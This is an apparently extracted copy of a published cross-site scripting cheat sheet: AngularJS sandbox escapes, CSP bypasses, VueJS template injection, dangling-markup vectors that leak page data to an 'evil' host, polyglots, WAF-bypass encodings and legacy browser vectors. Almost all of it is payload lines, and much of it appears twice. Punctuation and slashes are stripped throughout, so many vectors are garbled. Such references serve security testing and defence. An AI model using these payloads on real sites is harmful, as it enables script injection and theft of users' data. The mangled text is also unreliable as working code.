79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequenceand base64 encoded string (window)
window[x65x76x61x6c](window[x61x6cx65x72x74](window[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (self)
self[x65x76x61x6c](self[x61x6cx65x72x74](self[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (this)
this[x65x76x61x6c](this[x61x6cx65x72x74](this[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (top)
top[x65x76x61x6c](top[x61x6cx65x72x74](top[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (parent)
parent[x65x76x61x6c](parent[x61x6cx65x72x74](parent[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
window[fooalertbar](window[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (self) self[fooalertbar](self[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (this) this[fooalertbar](this[foodocumentbar][domain])
XSS into a JavaScript string comment syntax (top) top[fooalertbar](top[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(parent)
parent[fooalertbar](parent[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(frames)
frames[fooalertbar](frames[foodocumentbar][domain])
XSS into a JavaScript string comment syntax(globalThis)
globalThis[fooalertbar](globalThis[foodocumentbar][domain])
XSS into a JavaScript string hex escape sequence(window)
window[x61x6cx65x72x74](window[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(self)
self[x61x6cx65x72x74](self[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(this)
this[x61x6cx65x72x74](this[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(top)
top[x61x6cx65x72x74](top[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(parent)
parent[x61x6cx65x72x74](parent[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(frames)
frames[x61x6cx65x72x74](frames[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
XSS into a JavaScript string hex escape sequence(globalThis)
globalThis[x61x6cx65x72x74](globalThis[x64x6fx63x75x6dx65x6ex74][x64x6fx6dx61x69x6e])
